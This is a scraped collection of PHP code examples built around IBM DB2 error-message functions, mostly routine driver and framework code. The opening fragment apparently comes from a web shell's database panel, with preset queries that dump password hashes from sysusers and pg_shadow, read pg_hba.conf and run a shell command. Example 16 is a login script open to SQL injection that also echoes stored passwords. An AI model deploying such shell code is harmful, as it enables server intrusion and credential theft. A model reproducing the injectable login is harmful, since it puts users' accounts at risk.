                for ($i = 0; $i < ora_num_fields($result); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$orarow[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            oci_free_statement($oraresult);
            ocilogoff();
        }
    } elseif ($db == "ifx") {
        $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******';
        $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******';
        $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
        $ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
        $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
        $ifxquery = stripslashes($ifxquery);
        print <<<END
<form method="POST" name="ifxform" action="?s=w&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br><br>
<script language="javascript">
function ifxFull(i){
\tStr = new Array(11);
        Str[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
        Str[2] = "select name from sysdatabases;";
        Str[3] = "select tabname from systables;";
        Str[4] = "select colname from syscolumns where tabid=n;";
        Str[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">dbservername</option>
        <option value="1">databases</option>
        <option value="2">tables</option>
        <option value="3">columns</option>
        <option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($ifxaction == 'ifxquery') {
            $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
            $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
            $ifxrow = ifx_fetch_row($ifxresult);
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . ifx_fieldproperties($ifxresult);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            mysql_data_seek($ifxresult, 0);
            while ($ifxrow = ifx_fetch_row($ifxresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$ifxrow[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            ifx_free_result($ifxresult);
            ifx_close();
        }
    } elseif ($db == "db2") {
        $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
        $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
        $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******';
        $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******';
        $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
        $db2action = isset($_POST['action']) ? $_POST['action'] : '';
        $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
        $db2query = stripslashes($db2query);
        print <<<END
<form method="POST" name="db2form" action="?s=w&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br><br>
<script language="javascript">
function db2Full(i){
\tStr = new Array(4);
        Str[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
        Str[2] = "select name from sysibm.systables;";
        Str[3] = "select colname from syscat.columns where tabname='table_name';";
        Str[4] = "db2 get db cfg for db_name;";
\tdb2form.db2sql.value = Str[i];
\treturn true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">databases</option>
        <option value="1">tables</option>
        <option value="2">columns</option>
        <option value="3">db config</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($myaction == 'db2query') {
            //$db2string = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=$db2dbname;"."HOSTNAME=$db2host;PORT=$db2port;PROTOCOL=TCPIP;UID=$db2user;PWD=$db2pass;";
            $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
            $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
            $db2row = db2_fetch_row($db2result);
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                echo '<td bgcolor="#228B22"><b>' . db2_field_name($db2result);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            while ($db2row = db2_fetch_row($db2result)) {
                echo "<tr>\n";
                for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$db2row[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            db2_free_result($db2result);
            db2_close();
        }
    } elseif ($db == "fb") {
        $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
        $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
        $fbpath = str_replace("\\\\", "\\", $fbpath);
        $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******';
        $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******';
        $fbaction = isset($_POST['action']) ? $_POST['action'] : '';
        $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
        $fbquery = stripslashes($fbquery);
        print <<<END
<form method="POST" name="fbform" action="?s=w&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
\tStr = new Array(5);
        Str[0] = "";
\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
        Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
        Str[3] = "input 'D:\\createtable.sql';";
        Str[4] = "shell netstat -an;";
\tfbform.fbsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">tables</option>
        <option value="2">columns</option>
        <option value="3">import sql</option>
        <option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($fbaction == 'fbquery') {
            $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
            $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . ibase_field_info($fbresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            ibase_field_info($fbresult, 0);
            while ($fbrow = ibase_fetch_row($fbresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$fbrow[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            ibase_free_result($fbresult);
            ibase_close();
        }
    } else {
        $pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost';
        $pguser = isset($_POST['pguser']) ? $_POST['pguser'] : '******';
        $pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : '';
        $pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres';
        $pgaction = isset($_POST['action']) ? $_POST['action'] : '';
        $pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : '';
        $pgquery = stripslashes($pgquery);
        print <<<END
<form method="POST" name="pgform" action="?s=w">
<div class="actall">Host:<input type="text" name="pghost" value="{$pghost}" style="width:100px;">
User:<input type="text" name="pguser" vaule="{$pguser}" style="width:100px">
Pass:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
Dbname:<input type="text" name="pgdbname" value="{$pgdbname}" style="width:100px"><br><br>
<script language="javascript">
function pgFull(i){
\tStr = new Array(7);
\tStr[0] = "";
        Str[1] = "select version();";
        Str[2] = "select datname from pg_database;";
        Str[3] = "select relname from pg_stat_user_tables limit 1 offset n;";
        Str[4] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
        Str[5] = "select usename,passwd from pg_shadow;";
\tStr[6] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
\tpgform.pgsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
<select onchange="return pgFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">hashes</option>
\t<option value="6">pg_hb.conf</option>
</select>
<input type="hidden" name="action" value="pgquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
        if ($pgaction == 'pgquery') {
            $pgconn = pg_connect("host={$pghost} dbname={$pgdbname} user={$pguser} password={$pgpass} ") or die('Could not connect: ' . pg_last_error());
            $pgresult = pg_query($pgquery) or die('Query failed: ' . pg_last_error());
            $pgrow = pg_fetch_row($pgresult);
            echo '<font face="verdana">';
            echo '<table border="1" cellpadding="1" cellspacing="2">';
            echo "\n<tr>\n";
            for ($i = 0; $i < pg_num_fields($pgresult); $i++) {
                echo '<td bgcolor="#228B22"><b>' . pg_field_name($pgresult, $i);
                echo "</b></td>\n";
            }
            echo "</tr>\n";
            pg_result_seek($pgresult, 0);
            while ($pgrow = pg_fetch_row($pgresult)) {
                echo "<tr>\n";
                for ($i = 0; $i < pg_num_fields($pgresult); $i++) {
                    echo '<td bgcolor="#B8B8E8">';
                    echo "{$pgrow[$i]}";
                    echo '</td>';
                }
                echo "</tr>\n";
            }
            echo "</table>\n";
            echo "</font>";
            pg_free_result($pgresult);
            pg_close();
        }
    }
}
Esempio n. 15
0
 private function check_and_print_stmt_error($stmt = false)
 {
     $skip_errnos = array('02000');
     if ($stmt) {
         if ($error = db2_stmt_errormsg($stmt)) {
             $errno = db2_stmt_error($stmt);
             if (in_array($errno, $skip_errnos)) {
                 return false;
             }
             $this->print_error($error, $errno);
             return true;
         }
         return false;
     } else {
         if ($error = db2_stmt_errormsg()) {
             $errno = db2_stmt_error();
             if (in_array($errno, $skip_errnos)) {
                 return false;
             }
             $this->print_error($error, $errno);
             return true;
         }
     }
     return false;
 }
Esempio n. 16
0
<?php

session_unset();
error_reporting(0);
session_start();
include 'connect.php';
if (isset($_POST['userName']) && isset($_POST['password'])) {
    $usernameEntered = $_POST['userName'];
    $passwordEntered = $_POST['password'];
    $conn = db2_connect($database, $dbusername, $dbpassword);
    $sqlquery = "SELECT password FROM OWNER.USERS WHERE email = '{$usernameEntered}' ";
    $stmt = db2_prepare($conn, $sqlquery);
    if ($stmt) {
        $result = db2_execute($stmt);
        if (!$result) {
            db2_stmt_errormsg($stmt);
        }
        while ($row = db2_fetch_array($stmt)) {
            $passwordFromDb = $row[0];
        }
        db2_close($conn);
        echo $passwordFromDb;
        if ($passwordEntered == $passwordFromDb) {
            $_SESSION['username'] = $usernameEntered;
            header('Location: nav.php');
        } else {
            header('Location: login.php');
        }
    }
} else {
    http_response_code(400);
Esempio n. 17
0
 /**
  * Execute
  *
  * @param null $parameters
  * @return Result
  */
 public function execute($parameters = null)
 {
     if (!$this->isPrepared) {
         $this->prepare();
     }
     /** START Standard ParameterContainer Merging Block */
     if (!$this->parameterContainer instanceof ParameterContainer) {
         if ($parameters instanceof ParameterContainer) {
             $this->parameterContainer = $parameters;
             $parameters = null;
         } else {
             $this->parameterContainer = new ParameterContainer();
         }
     }
     if (is_array($parameters)) {
         $this->parameterContainer->setFromArray($parameters);
     }
     /** END Standard ParameterContainer Merging Block */
     if ($this->profiler) {
         $this->profiler->profilerStart($this);
     }
     set_error_handler(function () {
     }, E_WARNING);
     // suppress warnings
     $response = db2_execute($this->resource, $this->parameterContainer->getPositionalArray());
     restore_error_handler();
     if ($this->profiler) {
         $this->profiler->profilerFinish();
     }
     if ($response === false) {
         throw new Exception\RuntimeException(db2_stmt_errormsg($this->resource));
     }
     $result = $this->driver->createResult($this->resource);
     return $result;
 }
Esempio n. 18
0
 /**
  * (non-PHPdoc)
  * @see DBManager::lastDbError()
  */
 public function lastDbError()
 {
     if (db2_conn_error()) {
         return "IBM_DB2 connection error " . db2_conn_error() . ": " . db2_conn_errormsg();
     }
     /* FIXME:
      * Added $connOnly parameter to skip the statement error check
      * as there is a statics bug in the DB2 driver which persists failures
      * http://pecl.php.net/bugs/bug.php?id=22854
      */
     if (!$this->ignoreErrors) {
         $error = db2_stmt_error();
         if ($error) {
             return "IBM_DB2 statement error " . $error . ": " . db2_stmt_errormsg();
         }
     }
     return false;
 }
Esempio n. 19
0
 /**
  * Returns a formatted error message from previous database operation.
  * DB2 distinguishes between statement and connnection errors so we
  * must check for both.
  *
  * @return string Error message with error number
  */
 function lastError()
 {
     if (db2_stmt_error()) {
         return db2_stmt_error() . ': ' . db2_stmt_errormsg();
     } elseif (db2_conn_error()) {
         return db2_conn_error() . ': ' . db2_conn_errormsg();
     }
     return null;
 }
Esempio n. 20
0
 /**
  * Execute
  *
  * @param  string $sql
  * @return Result
  */
 public function execute($sql)
 {
     if (!$this->isConnected()) {
         $this->connect();
     }
     if ($this->profiler) {
         $this->profiler->profilerStart($sql);
     }
     set_error_handler(function () {
     }, E_WARNING);
     // suppress warnings
     $resultResource = db2_exec($this->resource, $sql);
     restore_error_handler();
     if ($this->profiler) {
         $this->profiler->profilerFinish($sql);
     }
     // if the returnValue is something other than a pg result resource, bypass wrapping it
     if ($resultResource === false) {
         throw new Exception\InvalidQueryException(db2_stmt_errormsg());
     }
     $resultPrototype = $this->driver->createResult($resultResource === true ? $this->resource : $resultResource);
     return $resultPrototype;
 }
Esempio n. 21
0
function DBexecute($query, $skip_error_messages = 0)
{
    global $DB;
    if (!isset($DB['DB']) || empty($DB['DB'])) {
        return false;
    }
    $result = false;
    $time_start = microtime(true);
    $DB['EXECUTE_COUNT']++;
    switch ($DB['TYPE']) {
        case ZBX_DB_MYSQL:
            if (!($result = mysqli_query($DB['DB'], $query))) {
                error('Error in query [' . $query . '] [' . mysqli_error($DB['DB']) . ']');
            }
            break;
        case ZBX_DB_POSTGRESQL:
            if (!($result = (bool) pg_query($DB['DB'], $query))) {
                error('Error in query [' . $query . '] [' . pg_last_error() . ']');
            }
            break;
        case ZBX_DB_ORACLE:
            if (!($result = oci_parse($DB['DB'], $query))) {
                $e = @oci_error();
                error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']');
            } elseif (!@oci_execute($result, $DB['TRANSACTIONS'] ? OCI_DEFAULT : OCI_COMMIT_ON_SUCCESS)) {
                $e = oci_error($result);
                error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']');
            } else {
                $result = true;
                // function must return boolean
            }
            break;
        case ZBX_DB_DB2:
            if (!($result = db2_prepare($DB['DB'], $query))) {
                $e = @db2_stmt_errormsg($result);
                error('SQL error [' . $query . '] in [' . $e . ']');
            } elseif (true !== @db2_execute($result)) {
                $e = @db2_stmt_errormsg($result);
                error('SQL error [' . $query . '] in [' . $e . ']');
            } else {
                $result = true;
                // function must return boolean
            }
            break;
        case ZBX_DB_SQLITE3:
            if ($DB['TRANSACTIONS'] == 0) {
                lock_sqlite3_access();
            }
            if (!($result = $DB['DB']->exec($query))) {
                error('Error in query [' . $query . '] Error code [' . $DB['DB']->lastErrorCode() . '] Message [' . $DB['DB']->lastErrorMsg() . ']');
            }
            if ($DB['TRANSACTIONS'] == 0) {
                unlock_sqlite3_access();
            }
            break;
    }
    if ($DB['TRANSACTIONS'] != 0 && !$result) {
        $DB['TRANSACTION_NO_FAILED_SQLS'] = false;
    }
    CProfiler::getInstance()->profileSql(microtime(true) - $time_start, $query);
    return (bool) $result;
}
Esempio n. 22
0
 protected function _rawQuery($sql)
 {
     $conn = $this->_db->getConnection();
     $result = @db2_exec($conn, $sql);
     if (!$result) {
         $e = db2_stmt_errormsg();
         require_once 'Zend/Db/Exception.php';
         throw new Zend_Db_Exception("SQL error for \"{$sql}\": {$e}");
     }
 }
Esempio n. 23
0
 /**
  * This function processes an SQL statement that will NOT return data.
  *
  * @access public
  * @override
  * @param string $sql                           the SQL statement
  * @throws Throwable_SQL_Exception              indicates that the executed
  *                                              statement failed
  *
  * @see http://www.php.net/manual/en/function.db2-exec.php
  * @see http://www.php.net/manual/en/function.db2-free-result.php
  */
 public function execute($sql)
 {
     if (!$this->is_connected()) {
         throw new Throwable_SQL_Exception('Message: Failed to execute SQL statement. Reason: Unable to find connection.');
     }
     $command = @db2_exec($this->resource, $sql);
     if ($command === FALSE) {
         throw new Throwable_SQL_Exception('Message: Failed to execute SQL statement. Reason: :reason', array(':reason' => @db2_stmt_errormsg($command)));
     }
     $this->sql = $sql;
     @db2_free_result($command);
 }
Esempio n. 24
0
 public function doQuery($sql)
 {
     //print "<li><pre>$sql</pre></li>";
     // Switch into the correct namespace
     $this->applySchema();
     $ret = db2_exec($this->mConn, $sql, $this->mStmtOptions);
     if (!$ret) {
         print "<br><pre>";
         print $sql;
         print "</pre><br>";
         $error = db2_stmt_errormsg();
         throw new DBUnexpectedError($this, 'SQL error: ' . htmlspecialchars($error));
     }
     $this->mLastResult = $ret;
     $this->mAffectedRows = null;
     // Not calculated until asked for
     return $ret;
 }
Esempio n. 25
0
 /**
  * {@inheritdoc}
  */
 public function execute($params = null)
 {
     if (!$this->_stmt) {
         return false;
     }
     /*$retval = true;
       if ($params !== null) {
           $retval = @db2_execute($this->_stmt, $params);
       } else {
           $retval = @db2_execute($this->_stmt);
       }*/
     if ($params === null) {
         ksort($this->_bindParam);
         $params = array_values($this->_bindParam);
     }
     $retval = @db2_execute($this->_stmt, $params);
     if ($retval === false) {
         throw new DB2Exception(db2_stmt_errormsg());
     }
     return $retval;
 }
Esempio n. 26
0
 /**
  * Gets a property value in the fetched row given a SQL statement.
  *
  * @param unknown $sql
  *        	the sql statement.
  * @throws Exception
  * @return the property value.
  */
 public function fetchObjectProperty($sql, $property)
 {
     $propertyValue = null;
     $connection = $this->connect();
     $stmt = db2_prepare($connection, $sql);
     $result = db2_execute($stmt, array(0));
     if ($result) {
         while (db2_fetch_row($stmt)) {
             $propertyValue = db2_result($stmt, $property);
         }
     } else {
         $message = "\nCould not fetch the object from database table. " . db2_stmt_errormsg($stmt);
         throw new Exception($message);
     }
     $this->__destruct();
     return $propertyValue;
 }
Esempio n. 27
0
/**
 * Gets the latest database error message.
 *
 * @return string The text of the last database error.  (The type of
 *                information varies depending on the which type of database
 *                is being used.)
 */
function dbi_error()
{
    if (strcmp($GLOBALS["db_type"], "mysql") == 0) {
        $ret = mysql_error();
    } else {
        if (strcmp($GLOBALS["db_type"], "mysqli") == 0) {
            $ret = mysqli_error($GLOBALS["db_connection"]);
        } else {
            if (strcmp($GLOBALS["db_type"], "mssql") == 0) {
                // no real mssql_error function. this is as good as it gets
                $ret = mssql_get_last_message();
            } else {
                if (strcmp($GLOBALS["db_type"], "oracle") == 0) {
                    $ret = OCIError($GLOBALS["oracle_connection"]);
                } else {
                    if (strcmp($GLOBALS["db_type"], "postgresql") == 0) {
                        $ret = pg_errormessage($GLOBALS["postgresql_connection"]);
                    } else {
                        if (strcmp($GLOBALS["db_type"], "odbc") == 0) {
                            // no way to get error from ODBC API
                            $ret = "Unknown ODBC error";
                        } else {
                            if (strcmp($GLOBALS["db_type"], "ibm_db2") == 0) {
                                $ret = db2_conn_errormsg();
                                if ($ret == '') {
                                    $ret = db2_stmt_errormsg();
                                }
                            } else {
                                if (strcmp($GLOBALS["db_type"], "ibase") == 0) {
                                    $ret = ibase_errmsg();
                                } else {
                                    $ret = "dbi_error(): db_type not defined.";
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    if (strlen($ret)) {
        return $ret;
    } else {
        return "Unknown error";
    }
}
Esempio n. 28
0
 /**
  * Prepare a statement handle.
  *
  * @param string $sql
  * @return void
  * @throws Zend_Db_Statement_Db2_Exception
  */
 public function _prepSql($sql)
 {
     Zend_Db_Statement::_prepSql($sql);
     $connection = $this->_connection->getConnection();
     $this->_stmt = db2_prepare($connection, $sql);
     if (!$this->_stmt) {
         require_once 'Zend/Db/Statement/Db2/Exception.php';
         throw new Zend_Db_Statement_Db2_Exception(db2_stmt_errormsg($this->_stmt), db2_stmt_error($this->_stmt));
     }
 }
Esempio n. 29
0
 /**
  * Checks to see if an SQL error occured
  * 
  * @param  fResult|fUnbufferedResult|boolean $result      The result object for the query
  * @param  mixed                             $extra_info  The sqlite extension will pass a string error message, the oci8 extension will pass the statement resource
  * @param  string                            $sql         The SQL that was executed
  * @return void
  */
 private function checkForError($result, $extra_info = NULL, $sql = NULL)
 {
     if ($result === FALSE || $result->getResult() === FALSE) {
         if ($this->extension == 'ibm_db2') {
             if (is_resource($extra_info)) {
                 $message = db2_stmt_errormsg($extra_info);
             } else {
                 $message = db2_stmt_errormsg();
             }
         } elseif ($this->extension == 'mssql') {
             $message = $this->error;
             unset($this->error);
         } elseif ($this->extension == 'mysql') {
             $message = mysql_error($this->connection);
         } elseif ($this->extension == 'mysqli') {
             if (is_object($extra_info)) {
                 $message = $extra_info->error;
             } else {
                 $message = mysqli_error($this->connection);
             }
         } elseif ($this->extension == 'oci8') {
             $error_info = oci_error($extra_info);
             $message = $error_info['message'];
         } elseif ($this->extension == 'pgsql') {
             $message = pg_last_error($this->connection);
         } elseif ($this->extension == 'sqlite') {
             $message = $extra_info;
         } elseif ($this->extension == 'sqlsrv') {
             $error_info = sqlsrv_errors(SQLSRV_ERR_ALL);
             $message = $error_info[0]['message'];
         } elseif ($this->extension == 'pdo') {
             if ($extra_info instanceof PDOStatement) {
                 $error_info = $extra_info->errorInfo();
             } else {
                 $error_info = $this->connection->errorInfo();
             }
             if (empty($error_info[2])) {
                 $error_info[2] = 'Unknown error - this usually indicates a bug in the PDO driver';
             }
             $message = $error_info[2];
         }
         $db_type_map = array('db2' => 'DB2', 'mssql' => 'MSSQL', 'mysql' => 'MySQL', 'oracle' => 'Oracle', 'postgresql' => 'PostgreSQL', 'sqlite' => 'SQLite');
         throw new fSQLException('%1$s error (%2$s) in %3$s', $db_type_map[$this->type], $message, is_object($result) ? $result->getSQL() : $sql);
     }
 }
 /**
  * Execute a prepared query with the various arguments
  * @param $prepared String: the prepared sql
  * @param $args Mixed: either an array here, or put scalars as varargs
  * @return Resource: results object
  */
 public function execute($prepared, $args = null)
 {
     if (!is_array($args)) {
         # Pull the var args
         $args = func_get_args();
         array_shift($args);
     }
     $res = db2_execute($prepared, $args);
     if (!$res) {
         $this->installPrint(db2_stmt_errormsg());
     }
     return $res;
 }